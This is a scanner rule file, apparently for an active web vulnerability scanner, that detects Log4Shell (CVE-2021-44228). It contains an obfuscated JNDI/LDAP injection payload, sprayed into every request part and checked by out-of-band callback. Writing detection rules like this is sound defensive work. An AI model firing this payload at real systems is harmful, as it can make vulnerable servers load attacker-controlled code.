name = active-log4shell
type = Active
enabled = true
detail = {
    severity = High
    confidence = Tentative
    author = "XhstormR"
    description = """CVE-2021-44228"""
    links = [
        "https://www.lunasec.io/docs/blog/log4j-zero-day/"
    ]
}
rules = [
    {
        payload = {
            part = Any
            action = Replace
            name = "*"
            oob = true
            values = [
                """${j${lower:N}${lower:D}i:l${lower:D}ap://#{BC}/a}"""
            ]
        }
    }
]
